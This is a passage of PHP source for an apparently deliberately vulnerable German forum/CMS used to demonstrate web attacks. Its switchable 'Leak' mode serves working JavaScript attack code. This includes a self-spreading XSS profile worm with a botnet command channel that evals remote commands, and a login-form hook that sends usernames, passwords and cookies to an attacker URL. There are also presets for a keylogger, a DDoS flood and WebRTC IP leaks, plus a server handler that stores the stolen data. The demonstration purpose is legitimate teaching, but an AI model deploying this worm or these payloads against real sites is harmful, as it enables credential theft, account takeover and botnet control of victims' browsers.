if(is_string($local))
$local = preg_match($local,$addr);
if(
$home)
foreach(
$array as $key => $var)
foreach(
$var as $k => $v)
if(
preg_match('!^(ht|f)tps?://!',$v))
$array[$key][$k] = (@file_exists($val = "$home/".basename($v))) ? preg_replace(array('!(?<=^|/)([^/]+\.)?\./|/(?=/)!','!^(?=/)!'),array('',substr($Self,0,-strlen($self))),preg_replace('![^/]*$!','',$self)."/$val") : preg_replace('/\s*#.*$/','',$v);
if(
preg_match('/^(Kennwort|Profil|(Anmeld|(Da|Bearbei)t)en)$/',$request)) // Kennwortfragen Sortieren
sort($pass);
if(isset(
$_GET['page']) and preg_match('/^(\d*)(?:[,\/-](\d+))?$/',$_GET['page'],$var)) {
$page = array($var[0],"page=$var[0]");
$max = max(min(((isset($var[2])) ? $var[2] : $paging[1]),$paging[2]),$paging[0]);
}
else {
$page = array("","");
$max = $paging[1];
}
if(isset(
$_POST['stop']))
if(
$mode)
$request = $mode;
elseif(
$request == 'Admin')
$request = '';
elseif(
$request == 'Bearbeiten')
$request = 'Profil';
elseif(
$request != 'CMS')
$request = false;
if(
$request == '')
if(
$s == 'b')
$request = 'Blog';
elseif(
$s == 'm') {
$request = 'Mail';
if(!
$mid and $id)
$mid = $id;
}
if(isset(
$_GET['id']) and preg_match('/^\d+|[cd]$/',$_GET['id']) and $request != 'Profile')
$getopt[] = "id=$_GET[id]";
if(
$s)
$getopt[] = "s=$s";
if(
$q)
$getopt[] = "q=".urlencode($q);
if(
$max != $paging[1])
$getopt[] = "page=,$max";
if(
$request == 'Mail')
$getopt[] = "s=m";
if(
$request == 'Blog')
$getopt[] = "s=b";
if(isset(
$_GET['new']))
$getopt[] = "new=1";
if(!isset(
$out))
$out = '';
$row = false;

# ZLib Anpassungen ermöglichen
foreach(explode(',','open,close,eof,file,read,write,encode,deflate,inflate') as $var)
if(!isset(
$gz[$var]))
$gz[$var] = "gz$var";

# Grafiken ausgeben
if($request == 'img' and $img and preg_match('/\d+/',$query,$var)) {
$array = array_values(array_slice($img,0,-1));
$var = ($var[0] < count($array)) ? $var[0] : 0;
if(
$cache) {
$date = gmdate("D, d M Y H:i:s",$time)." GMT";
header("Cache-Control: public");
header("Etag: $time");
if((
$val=(function_exists("apache_request_headers")) ? apache_request_headers() : array())
and isset(
$val["If-None-Match"]) and isset($val["If-Modified-Since"])
and
$val["If-None-Match"] == $time and $val["If-Modified-Since"] == $date
or isset($_SERVER["HTTP_IF_NONE_MATCH"]) and isset($_SERVER["HTTP_IF_MODIFIED_SINCE"])
and
$_SERVER["HTTP_IF_NONE_MATCH"] == $time and @$_SERVER["HTTP_IF_MODIFIED_SINCE"] == $date) {
header("HTTP/1.1 304 Not Modified");
exit();
}
header("Pragma: public");
header("Last-Modified: $date");
header("Cache-Control: public, max-age=".($eos*60));
}
header('Content-Type: image/'.(($var == count($array)-1) ? 'x-icon' : 'gif'));
die(
substr($gz['inflate'](base64_decode($img[1])),array_sum(array_slice($array,0,$var)),$array[$var]));
}

# Sicherheitslücken per Cookie abschaltbar machen
if(!$leak)
$leak = 0;
else {
if(
$request == 'Leak') {
$out = "<h3>Sichheitslücken wurden ";
if(isset(
$_COOKIE['leak']) and !$_COOKIE['leak'])
setcookie('leak',1,time()-$ctl,$self);
else {
setcookie('leak',0,0,$self);
$out .= "de";
}
$out .= "aktiviert!</h3>";
}
if(isset(
$_COOKIE['leak']))
$leak = ($_COOKIE['leak']) ? $leak : false;
if(
$leak === 1 or $leak and (preg_match('/^(127(\.\d+){3}|localhost|::1)$/i',$_SERVER['REMOTE_ADDR'])
or isset(
$_SERVER['SERVER_ADDR']) and $_SERVER['SERVER_ADDR'] == $_SERVER['REMOTE_ADDR'])) { // PHP-Code-Injection aktivieren
$leak = 1;
$creole = array_merge(array(str_replace(array(89,'$'),array('\d',''),key(array_slice($creole,0,1))) => current(array_slice($creole,0,1))),array_slice($creole,1));
$info[0] = ", [[^Creole]]-Formatierung";
}
elseif(
$leak)
$info[1] = "//PHP-[[::W/)Code_injection|+]] wurde aus Sicherheitsgründen im [[::w/)Quelltext]] deaktiviert. Und sollte nur im abgeschotteten [[::w/Local_Area_Network|Lokalen Netzwerk]] aktiviert und getestet werden!//\n";
}
if(
$leak) {
if(isset(
$_COOKIE['to']) and preg_match('!^https?://\S+!',$_COOKIE['to'],$var))
$attack['_jsleak_'] = "'$var[0]'";
$info[2] = "**Alle Daten werden in Klartext gespeichert und können durch ??ak?? ausgelesen werden!**\n";
$info[7] = " (//Nur im [[^Leak^Sicherheitslücken ein/aus Schalten^|Sicherheitsmodus]]//)";
if(!
preg_match('!^[\'"]?https?://!',$attack['_jsleak_']))
$info[5] = "Aus Sicherheitsgründen sind die ??ak?? mit relativen bzw. lokalen [[::w/)Pfad(name]]en entwickelt worden, so dass die Daten das ??if?? nie wirklich verlassen. //(Mit dem Nachteil, dass viele [[::w/Sicherheitssoftware|Security-Systeme]] die ??ak?? als ungefährlich einstufen.)//";
}
else
$sql[0] = preg_replace('/CREATE TABLE\s*\[(worm|xss)\][^;]+;/s','',$sql[0]);

# "Externen" Angriffs-Code (JavaScript) zurückgeben
$attack['_worm_'] = "<script>". /* Tagline-Wurm */"
new Image().src =
$attack[_jsleak_] + '?tl=' // Kopier-Adresse setzen
+ encodeURIComponent(document.getElementById('tl').innerHTML) // Kompletten Code kopieren
</script>"
;
if(
$leak and preg_match('/^(worm(line|test|y?)|(bnps))(?:\.(js|txt))?$/i',$request,$var)) { // Tiny-Profil-Wurm
$code = false;
$val = strtolower($var[1]);
if(
substr($val,0,4) == 'worm') {
if(
$var[2] == 'test' and isset($worm))
$code = $worm;
elseif(
$var[2] == 'line')
$code = $attack['_worm_'];
elseif(
$var[2] == 'y')
$code = "Wormy was here!".((isset($query) and $query != '' and preg_match('!^https?://!',$query))
?
"\n<p style='display:none'><iframe src='$gqs'></iframe></p>" : '')."<script>
try { var O = new XMLHttpRequest(); } // HTTP für Moderne Browser festlegen
catch(e) { O = new ActiveXObject('Microsoft.XMLHTTP'); } // HTTP für Internet Explorer festlegen
O.open('POST',location.pathname.replace(/(\.php\d*)(\/\w+)?$/,'$1/Bearbeiten'),false); // Benutzer-Profil mit Wurm aktualisieren
O.setRequestHeader('Content-Type','application/x-www-form-urlencoded'); // POST-Request ermöglichen
O.send('profil=' + encodeURIComponent(document.getElementById('profil').innerHTML // Komplettes Benutzerprofil auslesen
.replace(/^[^\\0]*?([^<>]*(?:<(p).*?<\/\\2>)?\s*<(script>)[^\\0]*?<\/\\3)$/i,'$1'))); // Nur den Wurm selber kopieren
</script>"
;
elseif(
$var[2] == '')
$code = "<script id='worm' title=\"". /* Umfangreicher Profil-BotWurm mit Tarnung */"
var J,S = [], W,O,R,M = ['0', -1, 10, 0, // M0-3 => Referrer, BotChatID, BotDelay, ReloadDelay
$attack[_jsleak_], // M4 => Hacker-Server
location.pathname.replace(/(\.php\d*).*$/,'$1')], // M5 => Url zum Forum
X = function(R) { // Daten Senden [ url, data ] (O,R)
top.window.bot = new Date().getTime(); // Wurm temporär fixieren (Aktuelle Zeit)
try { O = new XMLHttpRequest() } // HTTP für Moderne Browser festlegen
catch(e) {O = new ActiveXObject('Microsoft.XMLHTTP')} // HTTP für Internet Explorer festlegen
O.open((R[1] ? 'POST' : 'GET'),R[0],false); // GET oder POST-Request absenden
if(R[1]) {
O.setRequestHeader('Content-Type','application/x-www-form-urlencoded');// Post-Request Methode festlegen
O.setRequestHeader('Content-Length',R[1].length);
}
O.send(R[1] ? R[1] : ''); // Daten abschicken"
.((isset($_COOKIE['debug']) and $_COOKIE['debug']) ? "
R = R[0] + '\\x20->\\x20' + unescape(R[1]) + '\\n' + O.responseText; // Wurm-Requests Debuggen
if(top.jsdebug) top.jsdebug(R); else if(jsdebug) jsdebug(R); // Logs in Debug-Console ausgeben"
: "")."
return O.responseText; // Ergebnis zurück
},
Y = function(Y) { // Kurzform für encodeURIComponent
return encodeURIComponent(Y);
},
Z = function(W) { // BotNet [ CC-ID ] (J,W,O,R,M)
if((O=X([M[7],'chat=news:'+M[1]]) // Neue Befehle abrufen, Prüfen und ausführen
.match(/;-?(\d+),(\d+),(?:<!--\s*)?807:([\d-]+),([\d-]+),([^\\0]+?)(\/\/-->|;|$)/)) && W < O[3]) {
R = W, // Aktuelle CC-ID zum Auslesen merken
W = O[3]; // aktuelle Command-ID merken
if(O[4] == 0 || O[4] == M[9]) { // Befehl für Alle oder nur für den einen Bot
J++; // Counter für Empfangene Befehle
try { R = eval(O[5].replace(/%3b/ig,';').replace(/%25/g,'%')) } // Befehl ausführen
catch(e) { R = '3rr0r:%20' + e; } // Fehler zurückgeben
if(R) // Rückgabewert zurückschicken
X([M[7],'chat=call:0,' + Y(R)]);
}
}
if(M[3] && (M[3] -= M[2]) <= 0) // Zwangslogoff zuvorkommen
top.location.reload();
if(W >= 0) // Ein paar Sekunden warten
setTimeout('Z(' + W + ')',M[2] * 1e3);
};
window.onload = function() { // Warten bis Seite komplett geladen ist (W,O,J,M)
if((J = document.getElementsByTagName('meta'))) // Den Timeout-Refesh in Meta-Tags suchen
for(O=0;O<J.length;O++)
if(J[O].httpEquiv == 'refresh')
M[3] = parseInt(J[O].content.match(/(\d+)(?=.*?url=)/i)[1],10) - 300;// 5 Minuten vor Timeout
if((J=document.profile)&&(W=J.profil.value.match(/^([^\\0]*?)(\s+<script[^\\0]+?id=(.?)worm\\3[^\\0]*)$/i))) // Profil?
M[8] = W[2], J.profil.value = W[1], J.onsubmit = function() { // M8 => Wurm verstecken (M)
document.profile.profil.value += M[8]; // Beim speichern Wurm mit dranhängen
};
M[7] = M[5] + '/Chat'; // M7 => Botnet über Chat
M[9] = (J = document.getElementsByTagName('head')[0].innerHTML.match(/Atom\?id=(\d+)\./)) ? J[1] : 0; // M9 => User-ID
M[10] = new Date().getTime(); // M10 => Startzeit des Bot festhalten
Z(J = 0); // BotNet Starten
};
if((J = document.login)) // Login-Fenster Modifizieren, wenn es existiert
J.action = location.href, J.onsubmit = function() { // Beim Absenden eine Funktion ausführen (J,M)
J = document.login;
if(J.username.value || J.password.value) // Wenn Formular ausgefüllt ist,
X([M[4] + '?href=' + Y(location.host + location.pathname) // Logindaten zum Hacker schicken
+ '&data=' + Y(document.cookie + '; user=' + J.username.value
+ '; pass=' + J.password.value) + '&useragent=' + Y(navigator.userAgent)]);
};
if((R=(J=X([M[6]=M[5] + '/Bearbeiten?id'])).match(/(<td[^>]*>.*?(<\/td>)<td[^>]*>.*?\\2)/g))) // M6 => Profil-Link
for(W=0;W<R.length;W++)
if((O = R[W].match(/><b>(.*?):<\/b><\/td><td[^>]*>(?!<em>)(.*?)<\/td>/))) { // Profildaten Suchen
S[W] = Y(O[1]) + '=' + Y(O[2].replace(/<\/?\w+[^>]*>/g,'')); // Daten rausfischen
if((O = O[2].match(/<a .*?onClick='alert\(\w+\([^%]+([\w%]*)/)))
S[W] = S[W].replace(/[^=]*$/,Y(unescape(O[1]))); // Password dekodieren
if((O = R[W].match(/<a.href='(?!#)(?:mailto:)?([#-&,-z]+)/)))
S[W] = S[W].replace(/[^=]*$/,Y(O[1])); // Link dekodieren
}
if(S.length) // Alle Persönlichen Daten zum Hacker schicken!
O = new Image(), O.src = "
.preg_replace('/^.+$/',((isset($_COOKIE['debug']) and $_COOKIE['debug'])
?
"((top.jsdebug && (S = $0))\n\t\t? top.jsdebug(S) : ((jsdebug) ? jsdebug(S) : S))" : "$0"),
"M[4] + '?worm=1&referer=' + M[0] + '&' + S.join('&')")."; // S kann vom Bot weiter bearbeitet werden
if(!J.match(/ id=(.?)worm\\1|,W,O,R,M=/i) && (O=J.match(/<tex.area.*?>([^\\0]*)<\/tex.area>/))) { // Wurm vorhanden?
if(!O[1].length) // Benutzer hat noch kein Profiltext
O = J.match(/[<]div id='profil'>([^\\0]*)<\/div>[<]\/fieldset>/);
for(S=0;S<80;S++) // Wurm mit 80 Leerzeilen verstecken
O[1] += '\\n';
X([M[6],'profil=' + Y(O[1] + (document.getElementById('worm').outerHTML).replace(/'([\d,]+)(?=',)/, // Wurm Kopieren
'\'' + M[0] + ',' + ((O = document.getElementsByTagName('body')[0].innerHTML.match(/\?mail=(\d+).>Mail an/)) // get UID
? O[1] : ((O = location.href.match(/[?&]id=([\d,]+)/)) ? O[1] : '?'))))]); // Alternativ UID & Abstammung erweitern
} // V- Wurm nur Laden, wenn er noch nicht gestartet wurde oder der Bot 30 Sekunden inaktiv war
\">if(!top.window.bot || new Date().getTime() - top.window.bot > 3e4) // Bot nur einmal starten oder bei 30 sec inaktivtät
eval(document.getElementById('worm').title);</script>"
;
}
elseif(
$val == 'bnps') // Angriffs-Presets für den Control-Center
$code = strtr(<<<eof
a.push(
"!Report Bot", // Infos über den Bot und den Browser
"a = function(b) {return b.toUTCString().match(/((?!00)\d\d:)?\d\d:\d\d(?=\s)/)[0];};
'ID:' + W + ' Ref:' + M[0] + ',' + M[9] + ' Wait:' + M[2]
+ ' Timeout:' + a(new Date(M[3] * 1000)) + ' Runtime:' + a(new Date(new Date().getTime()-M[10]))
+ ' Count:' + J + ' ' + top.location.href + '%0aUserAgent:' + navigator.userAgent",
"!Get Bot Time", // Lokale Zeit des Bots ausgeben
"new Date().toString()", // new Date().toLocalString()
"!Reload Bot", // Aktuelle Seite neuladen (Bot neu starten)
"if(J > 1) {
top.location.reload();
'Reloaded'
}",
"!Remove Bot", // Selbst Zerstörung (Profil bleibt erhalten)
"X([M[6],'profil=' + Y(X([M[6]]).match(/[<](textarea).*?>([^\\0]*?)\s+(&(amp;)?lt;|<)script\s(id|title)=[^\\0]+?<\/\\1>/)[2])]);
'Removed'",
"!Sleep Bot", // Bot deaktivieren
"if(J > 1) {
W = -1;
'Sleeping...'
}",
"Chat: Decrypt-Text", // Verschlüsselte Chat-Nachricht entschlüsseln (Nur beim Sender/Empfänger möglich)
"top.CryptoJS.AES.decrypt('##var##'.replace(/^\w+\//,''),top.window.name.replace(/^key:[\w,]+,(?=\w+$)/,'')).toString(top.CryptoJS.enc.Utf8);",
"Chat: Get Keys", // Secret, Public und Script-Keys anzeigen
"a = top.F, b = top.window.name.replace(/^key:/,'').split(',');
(a ? 'n=' + a[2] + '%0ag=' + a[1] + '%0ap=' + a[0] + '%0a' : '') + 'a=' + b[0] + '%0aA=' + b[1] + '%0aK=' + b[2] + '%0a'",
"Debug-Infos", // Alle Bot-Variabeln zurückgeben
"M.join('%0a') + '%0a***%0a' + O.join('%0a') + '%0a***%0a' + [J,S,W].join('%0a')",
"DDoS-Attack,
$attack[_xlink_]", // Eine Webseite unter Dauerbeschuss setzen
"a = ['##var##','DDoS-Attack','name','DoS','id','DoS','style','display:none'],
b = top.document.createElement('iframe');
for(c=2;c<a.length;c+=2)
b.setAttribute(a[c],a[c+1]);
top.document.body.appendChild(b);
top.frames.DoS.document.write('<form name=\'DDoS\' target=\'tDDoS\' action=\'' + a[0] + '\' method=\'POST\'>
<input type=\'hidden\' name=\'q\' value=\'' + a[1] + '\'></form><iframe name=\'tDDoS\'></iframe>
<script>setInterval(function(){document.forms[\'DDoS\'].submit()},1000)</script>');
'Open Fire'",
"DDoS-STOP", // Waffenruhe
"if((a = top.document.getElementById('DoS')))
a.parentNode.removeChild(a);
'Peace'",
"Fenster-Titel,Hello World!", // Fenster-Titel ändern
"top.document.getElementsByClassName('title')[0].innerHTML = '##var##'",
"Hacked-Info,Y0u h4v3 b33n H4ck3d!", // Nachricht an den User schicken
"while(confirm('##var##'));
'Confirm'",
"Home-Profil,/Profil", // Das Benutzer-Profil aufrufen
"if(J > 1)
top.location.href = M[5] + '##var##'",
"Keylogger&nbsp;(Bugy)", // Alle Tasten loggen und alle 10 Sekunden zum Hacker schicken
"var a,K = '';
top.document.onkeypress = function(e) {
a = window.event ? event : e;
K += String.fromCharCode(a.keyCode ? a.keyCode : a.charCode);
};
window.setInterval(function() {
if(K != '')
X([M[7],'chat=call:0,' + Y(K)]);
K = '';
},10000);
'Keys logging'",
"Lock Browser,##pass##", // Browserfenster mit Kennwort sichern
"a = top.document.createElement('div');
a.setAttribute('style','position:fixed; top:0; left:0; width:100%; height:100%; background-color:rgba(0,0,0,0.7);');
top.document.body.appendChild(a);
b = 1;
while(prompt('Enter Password!') != '##var##')
b++;
a.parentNode.removeChild(a);
b + ' try(s)'",
"Place Kitten,
$attack[_clink_]", // Alle Standart-Grafiken durch Katzenbilder ersetzen
"for(d=0;d<top.document.images.length;d++)
top.document.images[d].src = '##var##/' + top.document.images[d].width + '/' + top.document.images[d].height + '?' + d;
a = top.document.getElementsByTagName('*');
for(b=0; b < a.length; b++)
if((c = top.window.getComputedStyle(a[b])) && c.backgroundImage && c.backgroundImage != 'none')
a[b].style.backgroundImage = 'url(##var##/' + parseInt(c.width) + '/' + parseInt(c.height) + '?' + d++ + ')';
d + ' Placed'",
"Popup-Layer,468 60
$attack[_blink_]", // Popup Öffnen
"a = top.document.createElement('div'),
b = '##var##'.match(/^(\d+)\D(\d+)\D(.*)$/);
a.setAttribute('style','position:fixed; width:' + (parseInt(b[1]) + 20) + '; height:' + (parseInt(b[2]) + 20) + '; border: 1px solid black;
background-color:white; top:50%; left:50%; transform:translate(-50%,-50%); -webkit-transform:translate(-50%,-50%);');
a.setAttribute('id','popup');
a.innerHTML = '<a style=\'position:absolute; top:-10; left:' + (parseInt(b[1]) + 10 ) + ';
width:20; border-radius:10px; text-align:center; background-color:red; color:white;\'
onclick=\'(a=top.document.getElementById(/popup/.source)).parentNode.removeChild(a)\' title=\'Close\'>X</a>
<iframe src=\'' + b[3] + '\' width=\'' + b[1] + '\' height=\'' + b[2] + '\' style=\'width:100%; height:100%\'></iframe>';
top.document.body.appendChild(a);
'Poping up'",
"Rick Rolling,640 480
$attack[_ylink_]",// Musikvideo abspielen
"a = top.document.createElement('div');
b = ['style','position:fixed; top:0; left:0; width:100%; height:100%; background-color:rgba(0,0,0,0.7);',
'ondblclick','this.parentNode.removeChild(this);','id','ricknroll'];
for(c=0;c<b.length;c+=2)
a.setAttribute(b[c],b[c+1]);
b = '##var##'.match(/^(\d+)\D(\d+)\D(.*)$/);
a.innerHTML = '<iframe src=\'' + b[3] + '\' width=\'' + b[1] + '\' height=\'' + b[2] + '\' frameborder=\'0\'
style=\'position:fixed; top:50%; left:50%; transform:translate(-50%,-50%); -webkit-transform:translate(-50%,-50%);\'></iframe>';
top.document.body.appendChild(a);
'Rick\'n\'Roll'",
"Rick Killing", // Musikvideo entfernen
"if((a = top.document.getElementById('ricknroll'))) {
a.parentNode.removeChild(a);
'Rick killed'
}",
"WebRTC-IPs,2000", // Lokale/Externe IP-Adresse des Bots ausgeben
"a = top.document.createElement('iframe');
a.setAttribute('id','iframe');
a.setAttribute('style','display:none');
a.setAttribute('sandbox','allow-same-origin');
top.document.body.appendChild(a);
function Q(a) {
if((a = /(\d{1,3}(\.\d{1,3}){3}|[a-f\d]{1,4}(:[a-f\d]{1,4}){7})/.exec(a)[1]) && c.indexOf(a) < 0)
c += ',%20' + a;
}
try {
b = !!window.webkitRTCPeerConnection,
c = '',
e = {iceServers: [{urls: 'stun:stun.services.mozilla.com'}]};
if(!(a = window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection)) {
d = iframe.contentWindow;
a = d.RTCPeerConnection || d.mozRTCPeerConnection || d.webkitRTCPeerConnection;
b = !!d.webkitRTCPeerConnection;
}
d = {optional: [{RtpDataChannels: true}]};
b = new a(e,d);
b.onicecandidate = function(a) {
if(a.candidate)
Q(a.candidate.candidate);
};
b.createDataChannel('');
b.createOffer(function(a) {
b.setLocalDescription(a, function(){}, function(){});
}, function(){});
} catch(e){};
setTimeout(function() {
try {
a = b.localDescription.sdp.split('%0a');
a.forEach(function(b) {
if(b.indexOf('a=candidate:') === 0)
Q(b);
});
} catch(e){};
if(c != '') {
X([M[7],'chat=call:0,' + c.substr(4)]);
(a = top.document.getElementById('iframe')).parentNode.removeChild(a);
}
},##var##);0",
"Worm-Loader [Install]", // XSS-BotWurm außerhalbs des Profils laden
"a = '';
for(b=0;b<80;b++)
a += '%09';
if((b = X([M[6]]).match(/<(\w+)[^>]*?id=.tl[^>]*?>(.*?)(?:\s*<(\w+).*?<\/\\3>)?\s*<\/\\1>/))) {
X([M[6],'tl=' + b[2] + unescape(a) + '<p style=\'display:none\'><iframe src=\'?request=Profil%26id=' + M[9] + '\'></iframe></p>']);
b[2];
}",
"Worm-Loader [Remove]", // XSS-BotWurm Loader deinstallieren
"if((b = X([M[6]]).match(/<(\w+)[^>]*?id=.tl[^>]*?>(.*?)(?:\s*<(\w+).*?<\/\\3>)?\s*<\/\\1>/))) {
X([M[6],'tl=' + b[2]]);
b[2];
}",
"Worm-Loader [Cookie]", // XSS-BotWurm-Loader im Cookie verstecken
"document.cookie='username=' + encodeURI(unescape('%22><script type=%22text/javascript%22 src=%22
$self/worm.js%22></script><input type=%22hidden'))");
eof
,array(
'##pass##' => ($a = explode(' ',$attack['_wordlist_'])) ? $a[rand(0,count($a)-1)] : ''));
if(!
$code)
$code = 'Malware not found ;-)';
$code = (isset($var[4]) and $var[4] == "txt" or !isset($var[4]) and preg_match('/[A-Z]/',substr($var[0],0,1))) ? array('plain',trim($code))
: array(
'javascript',((substr($val,0,4) == 'worm') ? "// Malware mit <script src='$self/$var[0]'></script> installieren!\ndocument.write(\""
.strtr(preg_replace($js,'',$code),array('\\' => '\\\\', '"' => '\\"')).'");' : strtr(preg_replace($js,'',$code),array('\\' => '\\\\'))));
header("Content-Type: text/$code[0]; charset=8859-1");
die(
$code[1]);
}

# Alle Cookie dauerhaft speichern (1 Jahr)
if($request == 'Cookie') {
$a = 0;
$val = time() + ((isset($_GET['time']) and preg_match('/\d+/',$_GET['time'],$val)) ? $val[0] : $ctl);
foreach(
$_COOKIE as $key => $var)
if(!
preg_match('/^('.preg_quote(session_name()).')$/',$key)) {
$a++;
setcookie($key,$var,$val,$self);
}
if(
$a)
$out = "<h3>Cookies werden bis zum ".date('d.m.Y H:i:s',$val)." gespeichert!</h3>";
}

# PHP-Version auf min 4.3 und max 7.0 prüfen
if(preg_match('/^(\d+)\.(\d+)/',phpversion(),$var) and ($var[1] < 4 or $var[1] == 4 and $var[2] < 3 or $var[1] >= 7)) {
$out .= "<h1>PHP von 4.3 bis 5.6 wird vorausgesetzt!</h1><h3>Empfohlen wird PHP 5.3 mit SQLite2 Addon!</h3>";
$request = 'Impressum';
$sql = false;
}

# SQLite vorbereiten, testen und bei Fehler neue Datenbank anlegen
elseif($sql) {
foreach(
preg_split('/\s+/',$sql[1]) as $val)
if(!isset(
$sql[$key = strtolower(preg_replace('/[^A-Z]+/','',$val))]))
$sql[$key] = 'sqlite_'.strtolower($val);
if(!
function_exists($sql['o']) or !defined('SQLITE_BOTH')) {
$sql = false;
if(
defined('SQLITE3_BOTH')) {
$var = "Das <a href='http://mengelke.de/.by'>SQLite3-Addon</a>";
if(
$val = glob(preg_replace('/(?=\.\w+$)/','*3',basename(__FILE__))) and count($val)) {
header("Location: ".preg_replace('/\/[^\/]*?$/','',$self)."/$val[0]");
header('HTTP/1.0 303 See Other');
$sql = 0;
}
}
else
$var = "Die PHP-Erweiterung SQLite";
$out = "<h1>$var ist nicht installiert!</h1>$out";
}
elseif(!
file_exists($base))
if(
$conn = @$sql['o']($base)) {
$sql['e']($conn,"begin;".preg_replace(array('/\s+/','/\s*(\W)\s*/'),array(' ','$1'),$sql[0])."commit;");
$sql['cl']($conn);
$out = "<h3>Datenbank wurde neu angelegt - Der <a href='$self/Anmelden'>Erste neue Benutzer</a> bekommt Admin-Rechte!</h3>$out";
$request = 'Impressum';
}
else
$out = "<h1>Die Datenbank konnte nicht erstellt werden!</h1>$out";
}

# Datenbank öffnen
if($sql and $conn = @$sql['o']($base,0666)) {
$sql['cf']($conn,'b64d','base64_decode',1);

# Datenbank überprüfen
if($wrt and preg_match_all('/(?:^|[,;])\s*(?:\w+\s\w+\s*\[([\w-]+)|\[([\w-]+))\]/ms',$sql[0],$array)) {
$val = array();
$sql[0] = '';
$array[1][] = $rw = '-';
foreach(
$array[1] as $key => $var) {
if(
$var != '') {
if(
$sql[0] != '') {
if(
$result = @$sql['q']($conn,$sql[0]) and count($sql[1]) == $rw = $sql['nf']($result)) {
for(
$a=0; $a < $sql['nf']($result); $a++)
if(
$sql[1][$a] != $rw = $sql['fn']($result,$a))
$val[] = "$var: $rw <> ".$sql[1][$a];
}
else
$val[] = "$var: $rw != ".count($sql[1])." ".print_r($result,true);
}
$sql[0] = "select * from [$var] limit 0";
$sql[1] = array();
}
else
$sql[1][] = $array[2][$key];
}
if(
$val) { // Datenbank ist defekt
$debug[] = array($conn,$val,$sql['aq']($conn,"select * from sqlite_master",SQLITE_ASSOC));
$sql['cl']($conn);
// @$sql['cl']($conn); // Bug?
if($svdb) { // Defekte Datenbank sichern
rename($base,$new = preg_replace('/(?=\.\w+$)/',date('_ymdHis'),$base));
if(
$fr = fopen($new,'rb') and $fw = $gz['open']("$new.gz",'wb')) { // Defekte Datenbank komprimiert sichern
while(!feof($fr))
$gz['write']($fw,fread($fr,1024));
fclose($fr);
$gz['close']($fw);
unlink($new);
}
}
else
unlink($base); // Defekte Datenbank nur löschen
if(file_exists("$base.gz") and ($fr=$gz['open']("$base.gz",'rb')) and ($fw=fopen($base,'wb'))) { // Letztes Backup zurückspielen
while(!gzeof($fr))
fwrite($fw,$gz['read']($fr,1024));
$gz['close']($fr);
fclose($fw);
@
touch($base,filemtime("$base.gz"));
}
$out = "<h1>Datenbank ist defekt und wurde gelöscht/zurückgesetzt!</h1>Weiter zum <a href='$self'>Forum</a>$out";
$conn = false;
}
$array = 0;
}

# Prüfen ob die Datenbank beschreibbar ist
$rw = false;
if(
$conn) {
if(isset(
$_COOKIE['write']) and $request == 'write') {
setcookie('write',0,time()-$ctl,$self);
unset(
$_COOKIE['write']);
}
if(!isset(
$_COOKIE['write']))
for(
$a=0; $a<3; $a++) {
if(@
$sql['e']($conn,"update [user] set id = 0 where 0 = 1") and !$sql['le']($conn)) {
$rw = true;
break;
}
sleep(1);
}
if(!
$rw) {
setcookie('write',1,0,$self);
$info[6] = "**++Die Datenbank ist schreibgeschützt! - Daher sind einige Funktionen [[^write^Wieder versuchen die Datenbank zu beschreiben^|deaktiviert]]!++**\n\n";
}
}
}

# Hacker-Code um Daten entgegen zu nehmen
if($sql and $conn and $leak and $rw) {
$wrt = (preg_match('/^(\d+)\.(\d+)/',phpversion(),$var) and ($var[1].$var[2]) > 51) ? 'UTF-8' : 'ISO-8859-1';
# Daten vom XSS-Worm
if(isset($_GET['worm']) and count($_GET) > 1 and $result = $sql['q']($conn,'select * from [worm] where id=0')) {
foreach(
$_GET as $key => $var)
$line[preg_replace('/&(\w)uml;/','$1e',$key)] = html_entity_decode($var,ENT_NOQUOTES,$wrt);
$row = $sql['nf']($result);
for(
$a=0;$a<$row;$a++) {
$key = $sql['fn']($result,$a);
if(isset(
$line[$key]))
$data["[$key]"] = "'".$sql['es']($line[$key])."'";
}
if(isset(
$data) and count($data) > 0 and isset($line['Benutzername']))
$sql['e']($conn,"
replace into [worm] ([create],"
.implode(",",array_keys($data)).")
values (datetime('now','localtime'),
"
.implode(",",array_values($data)).")");
$uid = true;
}
# Daten von XSS-Attacken
if(isset($_GET['href']) and isset($_GET['data'])) {
$data['data'] = $_GET['data'];
foreach(array(
'sess' => session_name(), 'user' => 'user', 'pass' => 'pass') as $key => $var)
if(
preg_match('/'.preg_quote($var,'/').'=([^\s;]*)\s*;?\s*/i',$data['data'],$val)) {
$data[$key] = html_entity_decode($val[1],ENT_NOQUOTES,$wrt);
$data['data'] = str_replace($val[0],'',$data['data']);
}
foreach(
$data as $key => $var) {
$data["[$key]"] = "nullif('".$sql['es']($var)."','')";
unset(
$data[$key]);
}
$sql['e']($conn,"
insert into [xss] ([create],[ip],[href],"
.implode(',',array_keys($data)).",[useragent])
values (datetime('now','localtime'),
'
$addr',
'"
.$sql['es']($_GET['href'])."',".implode(",",$data).",
nullif('"
.$sql['es'](@$_GET['useragent'])."',''))");
$uid = true;
}
if(
$uid) // Zur Tarnung eine Grafik zurückgeben
if($img) {
header('Content-Type: image/gif');
die(
substr($gz['inflate'](base64_decode($img[1])),0,$img[0]));
}
else
exit;
}

# Smilie Link-Tabelle erstellen
if($img and $img = array_keys($img)) {
foreach(
$img as $key => $var)
if(
preg_match('/(.+)-(.+)/',$var,$val))
$smile[$key+2] = "(".((strlen($val[1]) == 1) ? preg_quote($val[1]) : "[".preg_quote($val[1])."]")
.
"-?".((strlen($val[2]) == 1) ? preg_quote($val[2]) : "[".preg_quote($val[2])."]")."+)";
if(isset(
$smile) and is_array($smile) and count($smile))
$smile = array('/(?<=\||\s|^)(~?)('.implode('|',$smile).')(?=<\/?(p|[bh]r|strong|em)[^>]*>|\s|$)/e' =>
"('$1' == '~') ? '$2' : '<img src=\"".$self."/img?'.array_search('$2',explode(',',',$".implode(",$",array_keys($smile))."')).'\" '
.preg_replace('/[^\w\s=\"]/e','\"&#\".ord(\"\\\$0\").\";\"','alt=\"$2\" title=\"$2\"').' border=\"0\" />'"
);
}
else
$smile = array();

$a = -1; // Creole-Parser um Smilies und Variabeln erweitern
foreach($creole as $key => $var)
if(++
$a and $key == '/^$/') {
$creole = array_merge(array_slice($creole,0,$a),$smile,array(
'/([\[\{]?)::([l.])(?=[(\/?# |\])])/e' => '"$1".(("$1" == "") ? "" : (("$2" == ".") ? "%home%" : "%self%")).(("$2" == ".") ? preg_replace("/\/[^\/]*$/","",$self) : $self)',
'/::L(?=[\/?#()\w!&,. -]+)/' => $Self,
